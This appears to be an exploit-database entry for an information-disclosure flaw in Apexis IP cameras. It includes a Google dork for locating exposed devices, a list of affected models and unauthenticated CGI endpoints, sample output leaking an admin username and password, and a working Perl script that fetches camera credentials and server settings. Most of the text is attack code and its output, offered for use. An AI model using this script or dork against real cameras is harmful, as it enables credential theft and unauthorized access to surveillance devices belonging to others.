Apexis IP CAM - Information Disclosure Vulnerability

2015-06-16T00:00:00
ID 1337DAY-ID-23754
Type zdt
Reporter Sunplace
Modified 2015-06-16T00:00:00

Description

Exploit for hardware platform in category web applications

                                        
                                            *# Exploit Title: Apexis IP CAM - Full Info Disclosure **
**# Google Dork: inurl:"get_status.cgi"cgi-bin/**
**# Date: 01/06/2015**
**# Exploit Author: Sunplace Solutions - Soluciones Informáticas - #RE 
Remoteexecution.net**
**# Vendor Homepage: http://www.apexis.com.cn/**
**# Tested on: Linux**
*
*Models Afected :**
**
**APM-H602-MPC**
**APM-H803-MPC**
**APM-H901-MPC**
**APM-H501-MPC**
**APM-H403-MPC**
**APM-H804*
 
_*
*__*Usage: please enter the url ipcam Example : *_
 
http://server/cgi-bin/get_status.cgi o 
http://server/cgi-bin/get_tutk_account.cgi
 
_*You get something like this*__*:*_
 
[[email protected] ]$ perl xploit.pl
[ Apexis IP CAM - Full Info Disclosure ]
[ Discovery by: Sunplace Solutions ]
[ Exploit:  Sunplace Solutions - Daniel Godoy ]
[ Greetz: www.remoteexecution.net - ]
URL: http://server/cgi-bin/get_tutk_account.cgi
 
[x]Trying to pwn =>/get_tutk_account.cgi
Result:
tutk_result=1;
tutk_guid='FBX9937PJG273MPMMRZJ';
tutk_user='admin';
tutk_pwd='lolo2502';
 
[x]Trying to pwn => /get_tutk_account
Result:
tutk_result=1;
tutk_guid='FBX9937PJG273MPMMRZJ';
tutk_user='admin';
tutk_pwd='lolo2502';
 
[x]Trying to pwn => /get_extra_server.cgi
Result:
extraserv_result=1;
server_enable=0;
server_ipaddr='192.168.1.220';
server_port=6666;
server_time=10;
 
 
_*Index of /cgi-bin/ example:*_
 
backup_params.cgi
check_user.cgi
clear_log.cgi
control_cruise.cgi
decoder_control.cgi
delete_sdcard_file.cgi
download_sdcard_file.cgi
format_sdc.cgi
get_alarm_schedule.cgi
get_camera_vars.cgi
get_cruise.cgi
get_extra_server.cgi
get_list_cruise.cgi
get_log_info.cgi
get_log_page.cgi
get_maintain.cgi
get_motion_schedule.cgi
get_params.cgi
get_preset_status.cgi
get_real_status.cgi
get_sdc_status.cgi
get_status.cgi
get_sycc_account.cgi
get_tutk_account.cgi
get_wifi_scan_result.cgi
mobile_snapshot.cgi
reboot.cgi
 
And more......
 
 
 
_*[Exploit Code]*__*
*_
#!/usr/bin/perl
print "[ Apexis IP CAM - Full Info Disclosure ]\n";
print "[ Discovery by: Sunplace Solutions ]\n";
print "[ Exploit:  Sunplace Solutions ]\n";
print "[ Greetz: www.remoteexecution.net - Daniel Godoy ]\n";
print "URL: ";
$url=<STDIN>;
use LWP::UserAgent;
my $ua = LWP::UserAgent->new;
 
$ua->agent('Mozilla/35.0 (compatible; MSIE 5.0; Windows 7)');
 
chop($url);
if ($url eq "")
   {
     print 'URL dont empty!.'."\n";
   }
   else
   {
       $www = new LWP::UserAgent;
       @path=split(/cgi-bin/,$url);
       $content = $www->get($url) or error();
     print "\n[x]Trying to pwn =>".$path[1]."\n";
     print "Result: \n";
 
       $pwn = $content->content;
       $pwn=~ s/var//g;
       $pwn=~ s/ //g;
       $pwn=~ s/ret_//g;
       print $pwn;
 
     print "\n[x]Trying to pwn => /get_tutk_account\n";
     print "Result: \n";
       $content = $www->get($path[0]."cgi-bin/get_tutk_account.cgi") or 
error();
       $pwn = $content->content;
       $pwn=~ s/var//g;
       $pwn=~ s/ret_//g;
       $pwn=~ s/ //g;
 
       print $pwn;
 
     print "\n[x]Trying to pwn => /get_extra_server.cgi\n";
     print "Result: \n";
       $content = $www->get($path[0]."cgi-bin/get_extra_server.cgi") or 
error();
       $pwn = $content->content;
       $pwn=~ s/var//g;
       $pwn=~ s/ret_//g;
       $pwn=~ s/extra_//g;
       $pwn=~ s/ //g;
       print $pwn;
   }

#  0day.today [2018-04-01]  #